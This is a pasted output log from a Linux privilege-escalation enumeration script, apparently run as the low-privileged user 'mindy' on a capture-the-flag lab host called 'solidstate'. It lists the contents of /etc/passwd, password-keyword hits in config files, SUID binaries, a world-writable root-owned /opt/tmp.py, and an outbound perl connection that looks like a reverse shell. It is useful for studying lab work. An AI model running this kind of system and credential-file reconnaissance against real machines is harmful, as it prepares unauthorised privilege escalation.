Guest User

Untitled

a guest
Jan 5th, 2018
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 205.33 KB | None | 0 0
  1. =================================================================================================
  2. LINUX PRIVILEGE ESCALATION CHECKER
  3. =================================================================================================
  4.  
  5. [*] GETTING BASIC SYSTEM INFO...
  6.  
  7. [+] Kernel
  8. Linux version 4.9.0-3-686-pae (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18) ) #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06)
  9.  
  10. [+] Hostname
  11. solidstate
  12.  
  13. [+] Operating System
  14. Debian GNU/Linux 9 \n \l
  15.  
  16. [*] GETTING NETWORKING INFO...
  17.  
  18. [+] Interfaces
  19. ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
  20. inet 10.10.10.51 netmask 255.255.255.0 broadcast 10.10.10.255
  21. inet6 fe80::250:56ff:feaa:a9e9 prefixlen 64 scopeid 0x20<link>
  22. inet6 dead:beef::250:56ff:feaa:a9e9 prefixlen 64 scopeid 0x0<global>
  23. ether 00:50:56:aa:a9:e9 txqueuelen 1000 (Ethernet)
  24. RX packets 18361 bytes 2962690 (2.8 MiB)
  25. RX errors 0 dropped 49 overruns 0 frame 0
  26. TX packets 14152 bytes 3643184 (3.4 MiB)
  27. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  28. device interrupt 19 base 0x2000
  29. lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
  30. inet 127.0.0.1 netmask 255.0.0.0
  31. inet6 ::1 prefixlen 128 scopeid 0x10<host>
  32. loop txqueuelen 1 (Local Loopback)
  33. RX packets 14152 bytes 1145466 (1.0 MiB)
  34. RX errors 0 dropped 0 overruns 0 frame 0
  35. TX packets 14152 bytes 1145466 (1.0 MiB)
  36. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  37.  
  38. [+] Netstat
  39. Active Internet connections (servers and established)
  40. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  41. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
  42. tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
  43. tcp 0 0 10.10.10.51:22 10.10.14.125:34554 ESTABLISHED -
  44. tcp 0 0 10.10.10.51:37554 10.10.14.18:4445 ESTABLISHED 892/perl
  45. tcp 0 0 10.10.10.51:22 10.10.14.239:39624 ESTABLISHED -
  46. tcp 0 0 10.10.10.51:22 10.10.15.219:44592 ESTABLISHED -
  47. tcp 0 0 10.10.10.51:22 10.10.17.78:53052 ESTABLISHED -
  48. tcp 0 0 10.10.10.51:22 10.10.14.125:34560 ESTABLISHED -
  49. tcp 0 0 10.10.10.51:22 10.10.14.18:47522 ESTABLISHED -
  50. tcp 0 0 10.10.10.51:22 10.10.14.125:34558 ESTABLISHED -
  51. tcp 0 36 10.10.10.51:22 10.10.15.21:41482 ESTABLISHED -
  52. tcp 0 0 10.10.10.51:22 10.10.14.125:34556 ESTABLISHED -
  53. tcp6 0 0 :::22 :::* LISTEN -
  54. tcp6 0 0 ::1:631 :::* LISTEN -
  55. tcp6 0 0 :::119 :::* LISTEN -
  56. tcp6 0 0 :::25 :::* LISTEN -
  57. tcp6 0 0 :::4555 :::* LISTEN -
  58. tcp6 0 0 :::110 :::* LISTEN -
  59. tcp6 0 0 :::80 :::* LISTEN -
  60. udp 0 0 0.0.0.0:631 0.0.0.0:* -
  61. udp 0 0 0.0.0.0:38595 0.0.0.0:* -
  62. udp 0 0 0.0.0.0:5353 0.0.0.0:* -
  63. udp 0 0 0.0.0.0:1900 0.0.0.0:* -
  64. udp6 0 0 :::5353 :::* -
  65. udp6 0 0 :::59206 :::* -
  66.  
  67. [+] Route
  68. Kernel IP routing table
  69. Destination Gateway Genmask Flags Metric Ref Use Iface
  70. default gateway 0.0.0.0 UG 0 0 0 ens33
  71. 10.10.10.0 0.0.0.0 255.255.255.0 U 0 0 0 ens33
  72.  
  73. [*] GETTING FILESYSTEM INFO...
  74.  
  75. [+] Mount results
  76. sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
  77. proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
  78. udev on /dev type devtmpfs (rw,nosuid,relatime,size=246064k,nr_inodes=61516,mode=755)
  79. devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
  80. tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=50988k,mode=755)
  81. /dev/sda1 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
  82. securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
  83. tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
  84. tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
  85. tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
  86. cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
  87. pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
  88. cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
  89. cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
  90. cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
  91. cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
  92. cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
  93. cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
  94. cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
  95. cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
  96. cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
  97. systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=37,pgrp=1,timeout=0,minproto=5,maxproto=5,direct,pipe_ino=9416)
  98. hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
  99. mqueue on /dev/mqueue type mqueue (rw,relatime)
  100. debugfs on /sys/kernel/debug type debugfs (rw,relatime)
  101. tmpfs on /run/user/116 type tmpfs (rw,nosuid,nodev,relatime,size=50984k,mode=700,uid=116,gid=122)
  102. tmpfs on /run/user/1001 type tmpfs (rw,nosuid,nodev,relatime,size=50984k,mode=700,uid=1001,gid=1001)
  103. binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
  104.  
  105. [+] fstab entries
  106. # /etc/fstab: static file system information.
  107. #
  108. # Use 'blkid' to print the universally unique identifier for a
  109. # device; this may be used with UUID= as a more robust way to name devices
  110. # that works even if disks are added and removed. See fstab(5).
  111. #
  112. # <file system> <mount point> <type> <options> <dump> <pass>
  113. # / was on /dev/sda1 during installation
  114. UUID=a28a8ba2-4b0a-4d2e-a369-12c85145f384 / ext4 errors=remount-ro 0 1
  115. # swap was on /dev/sda5 during installation
  116. UUID=6cc53764-aad4-4383-9519-855f6d30eab8 none swap sw 0 0
  117. /dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
  118.  
  119. [+] Scheduled cron jobs
  120. -rw-r--r-- 1 root root 722 May 3 2015 /etc/crontab
  121. /etc/cron.d:
  122. total 24
  123. drwxr-xr-x 2 root root 4096 Jun 18 2017 .
  124. drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
  125. -rw-r--r-- 1 root root 285 May 29 2017 anacron
  126. -rw-r--r-- 1 root root 102 May 3 2015 .placeholder
  127. /etc/cron.daily:
  128. total 56
  129. drwxr-xr-x 2 root root 4096 Aug 22 13:21 .
  130. drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
  131. -rwxr-xr-x 1 root root 311 May 29 2017 0anacron
  132. -rwxr-xr-x 1 root root 539 Jul 18 14:36 apache2
  133. -rwxr-xr-x 1 root root 1474 Jun 1 2017 apt-compat
  134. -rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils
  135. -rwxr-xr-x 1 root root 384 Dec 12 2012 cracklib-runtime
  136. -rwxr-xr-x 1 root root 1597 Feb 22 2017 dpkg
  137. -rwxr-xr-x 1 root root 89 May 5 2015 logrotate
  138. -rwxr-xr-x 1 root root 1065 Dec 13 2016 man-db
  139. -rwxr-xr-x 1 root root 249 May 17 2017 passwd
  140. -rw-r--r-- 1 root root 102 May 3 2015 .placeholder
  141. /etc/cron.hourly:
  142. total 20
  143. drwxr-xr-x 2 root root 4096 Jun 18 2017 .
  144. drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
  145. -rw-r--r-- 1 root root 102 May 3 2015 .placeholder
  146. /etc/cron.monthly:
  147. total 24
  148. drwxr-xr-x 2 root root 4096 Jun 18 2017 .
  149. drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
  150. -rwxr-xr-x 1 root root 313 May 29 2017 0anacron
  151. -rw-r--r-- 1 root root 102 May 3 2015 .placeholder
  152. /etc/cron.weekly:
  153. total 28
  154. drwxr-xr-x 2 root root 4096 Jun 18 2017 .
  155. drwxr-xr-x 121 root root 12288 Aug 27 13:30 ..
  156. -rwxr-xr-x 1 root root 312 May 29 2017 0anacron
  157. -rwxr-xr-x 1 root root 723 Dec 13 2016 man-db
  158. -rw-r--r-- 1 root root 102 May 3 2015 .placeholder
  159.  
  160. [+] Writable cron dirs
  161.  
  162.  
  163. [*] ENUMERATING USER AND ENVIRONMENTAL INFO...
  164.  
  165. [+] Logged in User Activity
  166. 05:13:23 up 42 min, 5 users, load average: 0.24, 0.12, 0.04
  167. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  168. mindy pts/0 10.10.14.239 04:30 2:02 0.16s 0.01s bash
  169. mindy pts/1 10.10.14.18 04:31 8:58 0.06s 0.00s bash
  170. mindy pts/2 10.10.15.219 04:43 11.00s 0.56s 0.00s bash ./LinEnum.sh
  171. mindy pts/3 10.10.17.78 04:59 8.00s 0.21s 0.00s bash
  172. mindy pts/4 10.10.15.21 04:53 3.00s 0.16s 0.00s /bin/sh -c w 2>/dev/null
  173.  
  174. [+] Super Users Found:
  175. root
  176.  
  177. [+] Environment
  178. MAIL=/var/mail/mindy
  179. USER=mindy
  180. SSH_CLIENT=10.10.15.21 41482 22
  181. SHLVL=2
  182. OLDPWD=/opt
  183. HOME=/home/mindy
  184. SSH_TTY=/dev/pts/4
  185. DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
  186. LOGNAME=mindy
  187. _=/usr/bin/python
  188. XDG_SESSION_ID=19
  189. TERM=xterm-256color
  190. PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  191. XDG_RUNTIME_DIR=/run/user/1001
  192. LANG=en_US.UTF-8
  193. SHELL=/bin/bash
  194. PWD=/tmp
  195. SSH_CONNECTION=10.10.15.21 41482 10.10.10.51 22
  196.  
  197. [+] Root and current user history (depends on privs)
  198. -rw-r--r-- 1 root root 0 Aug 22 13:41 /home/mindy/.bash_history
  199.  
  200. [+] Sudoers (privileged)
  201.  
  202. [+] All users
  203. root:x:0:0:root:/root:/bin/bash
  204. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  205. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  206. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  207. sync:x:4:65534:sync:/bin:/bin/sync
  208. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  209. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  210. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  211. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  212. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  213. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  214. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  215. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  216. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  217. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  218. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  219. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  220. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  221. systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
  222. systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
  223. systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
  224. systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
  225. _apt:x:104:65534::/nonexistent:/bin/false
  226. usbmux:x:105:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
  227. rtkit:x:106:110:RealtimeKit,,,:/proc:/bin/false
  228. dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
  229. messagebus:x:108:111::/var/run/dbus:/bin/false
  230. geoclue:x:109:115::/var/lib/geoclue:/bin/false
  231. avahi:x:110:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
  232. colord:x:111:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
  233. saned:x:112:119::/var/lib/saned:/bin/false
  234. speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
  235. pulse:x:114:120:PulseAudio daemon,,,:/var/run/pulse:/bin/false
  236. hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
  237. Debian-gdm:x:116:122:Gnome Display Manager:/var/lib/gdm3:/bin/false
  238. sshd:x:117:65534::/run/sshd:/usr/sbin/nologin
  239. james:x:1000:1000:james:/home/james/:/bin/bash
  240. mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
  241.  
  242. [+] Current User
  243. mindy
  244.  
  245. [+] Current User ID
  246. uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
  247.  
  248. [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
  249.  
  250. [+] World Writeable Directories for User/Group 'Root'
  251. drwxrwxrwt 2 root root 40 Jan 5 04:30 /dev/mqueue
  252. drwxrwxrwt 2 root root 40 Jan 5 04:30 /dev/shm
  253. drwxrwxrwt 16 root root 4096 Jan 5 04:59 /var/tmp
  254. drwxrwxrwt 7 root root 4096 Jan 5 05:13 /tmp
  255. drwxrwxrwt 2 root root 4096 Jan 5 04:30 /tmp/.X11-unix
  256. drwxrwxrwt 2 root root 4096 Jan 5 04:30 /tmp/.XIM-unix
  257. drwxrwxrwt 2 root root 4096 Jan 5 04:30 /tmp/.font-unix
  258. drwxrwxrwt 2 root root 4096 Jan 5 04:30 /tmp/.ICE-unix
  259. drwxrwxrwt 2 root root 4096 Jan 5 04:30 /tmp/.Test-unix
  260. drwxrwxrwt 4 root root 100 Jan 5 04:30 /run/lock
  261.  
  262. [+] World Writeable Directories for Users other than Root
  263.  
  264. [+] World Writable Files
  265. -rwxrwxrwx 1 root root 137 Jan 5 04:59 /opt/tmp.py
  266. --w--w--w- 1 root root 0 Jan 5 05:13 /sys/fs/cgroup/memory/cgroup.event_control
  267.  
  268. [+] Checking if root's home folder is accessible
  269.  
  270. [+] SUID/SGID Files and Directories
  271. -rwsr-xr-x 1 root root 39144 May 17 2017 /bin/su
  272. -rwsr-xr-x 1 root root 38940 Mar 22 2017 /bin/mount
  273. -rwsr-xr-x 1 root root 30112 Jun 23 2016 /bin/fusermount
  274. -rwsr-xr-x 1 root root 68076 Nov 10 2016 /bin/ping
  275. -rwsr-xr-x 1 root root 161520 Feb 26 2017 /bin/ntfs-3g
  276. -rwsr-xr-x 1 root root 26504 Mar 22 2017 /bin/umount
  277. drwxr-s--- 2 root dip 4096 Jun 18 2017 /etc/chatscripts
  278. drwxr-s--- 2 root dip 4096 Jun 18 2017 /etc/ppp/peers
  279. -rwxr-sr-x 1 root shadow 34568 May 27 2017 /sbin/unix_chkpwd
  280. drwxrwsr-x 2 root staff 4096 Apr 4 2017 /var/local
  281. drwxrwsr-x 2 root mail 4096 Jun 18 2017 /var/mail
  282. -rwxr-sr-x 1 root tty 26416 Mar 22 2017 /usr/bin/wall
  283. -rwsr-xr-x 1 root root 34920 May 17 2017 /usr/bin/newgrp
  284. -rwxr-sr-x 1 root shadow 22040 May 17 2017 /usr/bin/expiry
  285. -rwxr-sr-x 1 root tty 9820 Apr 12 2017 /usr/bin/bsd-write
  286. -rwsr-xr-x 1 root root 22304 May 24 2017 /usr/bin/pkexec
  287. -rwxr-sr-x 1 root shadow 66120 May 17 2017 /usr/bin/chage
  288. -rwsr-xr-x 1 root root 57972 May 17 2017 /usr/bin/passwd
  289. -rwsr-xr-x 1 root root 39632 May 17 2017 /usr/bin/chsh
  290. -rwxr-sr-x 1 root crontab 39056 May 3 2015 /usr/bin/crontab
  291. -rwsr-xr-x 1 root root 48560 May 17 2017 /usr/bin/chfn
  292. -rwxr-sr-x 1 root mail 18084 Jan 17 2017 /usr/bin/dotlockfile
  293. -rwsr-xr-x 1 root root 78340 May 17 2017 /usr/bin/gpasswd
  294. -rwxr-sr-x 1 root ssh 431632 Jun 17 2017 /usr/bin/ssh-agent
  295. -rwsr-xr-- 1 root dip 363140 Nov 11 2016 /usr/sbin/pppd
  296. -rwsr-xr-x 1 root root 13960 May 24 2017 /usr/lib/policykit-1/polkit-agent-helper-1
  297. -rwsr-xr-x 1 root root 525932 Jun 17 2017 /usr/lib/openssh/ssh-keysign
  298. -rwxr-sr-x 1 root utmp 5480 Feb 18 2016 /usr/lib/i386-linux-gnu/utempter/utempter
  299. -rwsr-xr-x 1 root root 5480 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
  300. -rwxr-sr-x 1 root mail 13680 Mar 23 2017 /usr/lib/evolution/camel-lock-helper-1.2
  301. -rwsr-xr-- 1 root messagebus 46436 Apr 5 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  302. -rwsr-sr-x 1 root root 9772 Jul 7 01:09 /usr/lib/xorg/Xorg.wrap
  303. -rwsr-xr-x 1 root root 13672 Jan 14 2017 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
  304. drwxrwsr-t 2 root lpadmin 4096 Jan 31 2017 /usr/share/ppd/custom
  305. drwxrwsr-x 10 root staff 4096 Jun 18 2017 /usr/local
  306. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/games
  307. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/bin
  308. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/etc
  309. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/src
  310. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/sbin
  311. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/include
  312. drwxrwsr-x 4 root staff 4096 Jun 18 2017 /usr/local/lib
  313. drwxrwsr-x 4 root staff 4096 Jun 18 2017 /usr/local/lib/python2.7
  314. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/lib/python2.7/site-packages
  315. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/lib/python2.7/dist-packages
  316. drwxrwsr-x 3 root staff 4096 Jun 18 2017 /usr/local/lib/python3.5
  317. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/lib/python3.5/dist-packages
  318. drwxrwsr-x 8 root staff 4096 Jun 18 2017 /usr/local/share
  319. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/share/ca-certificates
  320. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/share/fonts
  321. drwxrwsr-x 6 root staff 4096 Jun 18 2017 /usr/local/share/xml
  322. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/share/xml/schema
  323. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/share/xml/misc
  324. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/share/xml/entities
  325. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/share/xml/declaration
  326. drwxrwsr-x 7 root staff 4096 Jun 18 2017 /usr/local/share/sgml
  327. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/share/sgml/dtd
  328. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/share/sgml/misc
  329. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/share/sgml/entities
  330. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/share/sgml/stylesheet
  331. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/share/sgml/declaration
  332. drwxrwsr-x 3 root staff 4096 Jun 18 2017 /usr/local/share/emacs
  333. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/share/emacs/site-lisp
  334. drwxrwsr-x 2 root staff 4096 Jun 18 2017 /usr/local/share/man
  335. drwxr-sr-x 3 root systemd-journal 60 Jan 5 04:30 /run/log/journal
  336. drwxr-s---+ 2 root systemd-journal 180 Jan 5 05:12 /run/log/journal/3b14ced53cef4e38b9b241c6989e06d8
  337.  
  338. [+] Logs containing keyword 'password'
  339.  
  340. [+] Config files containing keyword 'password'
  341. /etc/ssl/openssl.cnf:# input_password = secret
  342. /etc/ssl/openssl.cnf:# output_password = secret
  343. /etc/ssl/openssl.cnf:challengePassword = A challenge password
  344. /etc/cracklib/cracklib.conf:# passwords should not match. The files may optionally be compressed
  345. /etc/reportbug.conf:# Username and password for SMTP
  346. /etc/apache2/sites-available/default-ssl.conf: # Note that no password is obtained from the user. Every entry in the user
  347. /etc/apache2/sites-available/default-ssl.conf: # file needs this password: `xxj31ZMTZzkVA'.
  348. /etc/security/pwquality.conf:# Configuration for systemwide password quality limits
  349. /etc/security/pwquality.conf:# Number of characters in the new password that must not be present in the
  350. /etc/security/pwquality.conf:# old password.
  351. /etc/security/pwquality.conf:# Minimum acceptable size for the new password (plus one if
  352. /etc/security/pwquality.conf:# The maximum credit for having digits in the new password. If less than 0
  353. /etc/security/pwquality.conf:# it is the minimum number of digits in the new password.
  354. /etc/security/pwquality.conf:# The maximum credit for having uppercase characters in the new password.
  355. /etc/security/pwquality.conf:# password.
  356. /etc/security/pwquality.conf:# The maximum credit for having lowercase characters in the new password.
  357. /etc/security/pwquality.conf:# password.
  358. /etc/security/pwquality.conf:# The maximum credit for having other characters in the new password.
  359. /etc/security/pwquality.conf:# password.
  360. /etc/security/pwquality.conf:# password (digits, uppercase, lowercase, others).
  361. /etc/security/pwquality.conf:# The maximum number of allowed consecutive same characters in the new password.
  362. /etc/security/pwquality.conf:# new password.
  363. /etc/hdparm.conf:# --security-set-pass Set security password
  364. /etc/hdparm.conf:# security_pass = password
  365. /etc/hdparm.conf:# --user-master Select password to use
  366. /etc/debconf.conf:# World-readable, and accepts everything but passwords.
  367. /etc/debconf.conf:Reject-Type: password
  368. /etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
  369. /etc/debconf.conf:Name: passwords
  370. /etc/debconf.conf:Accept-Type: password
  371. /etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
  372. /etc/debconf.conf:# databases, one to hold passwords and one for everything else.
  373. /etc/debconf.conf:Stack: config, passwords
  374. /etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
  375. /etc/apg.conf:#Pronounceable passwords with special characters:
  376. /etc/apg.conf:#Pronounceable passwords without special characters:
  377. /etc/apg.conf:#Random passwords:
  378. /etc/bogofilter.cf:# the password database, or the user id
  379.  
  380. [+] Shadow File (Privileged)
  381.  
  382. [*] ENUMERATING PROCESSES AND APPLICATIONS...
  383.  
  384. [+] Installed Packages
  385. Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
  386. Err?=(none)/Reinst-required (Status,Err:
  387. Name Version Description
  388. accountsservice 0.6.43-1 query and manipulate user account information
  389. acl 2.2.52-3+b1 Access control list utilities
  390. adduser 3.115 add and remove users and groups
  391. adwaita-icon-theme 3.22.0-1 default icon theme of GNOME
  392. alsa-utils 1.1.3-1 Utilities for configuring and using ALSA
  393. anacron 2.3-24 cron-like program that doesn't go by time
  394. apache2 2.4.25-3+deb9u2 Apache HTTP Server
  395. apache2-bin 2.4.25-3+deb9u2 Apache HTTP Server (modules and other binary files)
  396. apache2-data 2.4.25-3+deb9u2 Apache HTTP Server (common files)
  397. apache2-utils 2.4.25-3+deb9u2 Apache HTTP Server (utility programs for web servers)
  398. apg 2.2.3.dfsg.1-4+b1 Automated Password Generator - Standalone version
  399. appstream 0.10.6-2 Software component metadata management
  400. apt 1.4.6 commandline package manager
  401. apt-listchanges 3.10 package change history notification tool
  402. apt-utils 1.4.6 package management related utility programs
  403. argyll 1.9.2+repack-1+b1 Color Management System, calibrator and profiler
  404. argyll-ref 1.9.2+repack-1 Color Management System, calibrator and profiler (data files)
  405. aspell 0.60.7~20110707-3+b2 GNU Aspell spell-checker
  406. aspell-en 2016.11.20-0-0.1 English dictionary for GNU Aspell
  407. at-spi2-core 2.22.0-6 Assistive Technology Service Provider Interface (dbus core)
  408. avahi-daemon 0.6.32-2 Avahi mDNS/DNS-SD daemon
  409. baobab 3.22.1-1 GNOME disk usage analyzer
  410. base-files 9.9 Debian base system miscellaneous files
  411. base-passwd 3.5.43 Debian base system master password and group files
  412. bash 4.4-5 GNU Bourne Again SHell
  413. bash-completion 1:2.1-4.3 programmable completion for the bash shell
  414. bc 1.06.95-9+b3 GNU bc arbitrary precision calculator language
  415. bind9-host 1:9.10.3.dfsg.P4-12.3+deb9u2 Version of 'host' bundled with BIND 9.X
  416. bluez 5.43-2 Bluetooth tools and daemons
  417. bluez-obexd 5.43-2 bluez obex daemon
  418. bogofilter 1.2.4+dfsg1-9 fast Bayesian spam filter (dummy package)
  419. bogofilter-bdb 1.2.4+dfsg1-9 fast Bayesian spam filter (Berkeley DB)
  420. bogofilter-common 1.2.4+dfsg1-9 fast Bayesian spam filter (common files)
  421. brasero 3.12.1-4 CD/DVD burning application for GNOME
  422. brasero-cdrkit:i386 3.12.1-4 cdrkit extensions for the Brasero burning application
  423. brasero-common 3.12.1-4 Common files for the Brasero CD burning application and library
  424. bsdmainutils 9.0.12+nmu1 collection of more utilities from FreeBSD
  425. bsdutils 1:2.29.2-1 basic utilities from 4.4BSD-Lite
  426. busybox 1:1.22.0-19+b3 Tiny utilities for small and embedded systems
  427. bzip2 1.0.6-8.1 high-quality block-sorting file compressor - utilities
  428. ca-certificates 20161130+nmu1 Common CA certificates
  429. ca-certificates-java 20170531+nmu1 Common CA certificates (JKS keystore)
  430. caribou 0.4.21-1+b1 Configurable on screen keyboard with scanning mode
  431. cdrdao 1:1.2.3-3 records CDs in Disk-At-Once (DAO) mode
  432. cheese 3.22.1-1+b1 tool to take pictures and videos from your webcam
  433. cheese-common 3.22.1-1 Common files for the Cheese tool to take pictures and videos
  434. chrome-gnome-shell 8-4 GNOME Shell extensions integration for web browsers
  435. coinor-libcbc3 2.8.12-1+b2 Coin-or branch-and-cut mixed integer programming solver (shared libraries)
  436. coinor-libcgl1 0.58.9-1+b1 COIN-OR Cut Generation Library
  437. coinor-libclp1 1.15.10-3+b1 Coin-or linear programming solver (shared libraries)
  438. coinor-libcoinmp1v5:i386 1.7.6+dfsg1-2 Simple C API for COIN-OR Solvers Clp and Cbc -- library
  439. coinor-libcoinutils3v5 2.9.15-4 Coin-or collection of utility classes (binaries and libraries)
  440. coinor-libosi1v5 0.106.9-2+b1 COIN-OR Open Solver Interface
  441. colord 1.3.3-2 system service to manage device colour profiles -- system daemon
  442. colord-data 1.3.3-2 system service to manage device colour profiles -- data files
  443. console-setup 1.164 console font and keymap setup program
  444. console-setup-linux 1.164 Linux specific part of console-setup
  445. coreutils 8.26-3 GNU core utilities
  446. cpio 2.11+dfsg-6 GNU cpio -- a program to manage archives of files
  447. cpp 4:6.3.0-4 GNU C preprocessor (cpp)
  448. cpp-6 6.3.0-18 GNU C preprocessor
  449. cracklib-runtime 2.9.2-5 runtime support for password checker library cracklib2
  450. crda 3.18-1 wireless Central Regulatory Domain Agent
  451. cron 3.0pl1-128+b1 process scheduling daemon
  452. cups 2.2.1-8 Common UNIX Printing System(tm) - PPD/driver support, web interface
  453. cups-browsed 1.11.6-3 OpenPrinting CUPS Filters - cups-browsed
  454. cups-bsd 2.2.1-8 Common UNIX Printing System(tm) - BSD commands
  455. cups-client 2.2.1-8 Common UNIX Printing System(tm) - client programs (SysV)
  456. cups-common 2.2.1-8 Common UNIX Printing System(tm) - common files
  457. cups-core-drivers 2.2.1-8 Common UNIX Printing System(tm) - PPD-less printing
  458. cups-daemon 2.2.1-8 Common UNIX Printing System(tm) - daemon
  459. cups-filters 1.11.6-3 OpenPrinting CUPS Filters - Main Package
  460. cups-filters-core-drivers 1.11.6-3 OpenPrinting CUPS Filters - PPD-less printing
  461. cups-pk-helper 0.2.6-1+b1 PolicyKit helper to configure cups with fine-grained privileges
  462. cups-ppdc 2.2.1-8 Common UNIX Printing System(tm) - PPD manipulation utilities
  463. cups-server-common 2.2.1-8 Common UNIX Printing System(tm) - server common files
  464. curl 7.52.1-5 command line tool for transferring data with URL syntax
  465. dash 0.5.8-2.4 POSIX-compliant shell
